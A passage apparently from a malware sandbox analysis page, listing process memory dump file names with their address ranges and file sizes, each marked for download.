          3.3MB

          Download

        • memory/4812-210-0x0000019067F00000-0x0000019067F22000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4972-44-0x0000000000C00000-0x0000000000FB2000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/4972-172-0x0000000007530000-0x0000000007AD4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/4972-175-0x00000000072B0000-0x00000000072BA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4972-187-0x00000000072D0000-0x00000000072DC000-memory.dmp

          Filesize

          48KB

          Download

        • memory/4972-177-0x0000000000C00000-0x0000000000FB2000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/4972-47-0x00000000039E0000-0x0000000003A46000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4972-46-0x0000000005C40000-0x0000000005CDC000-memory.dmp

          Filesize

          624KB

          Download

        • memory/4972-45-0x0000000000C00000-0x0000000000FB2000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/4972-174-0x0000000007310000-0x00000000073A2000-memory.dmp

          Filesize

          584KB

          Download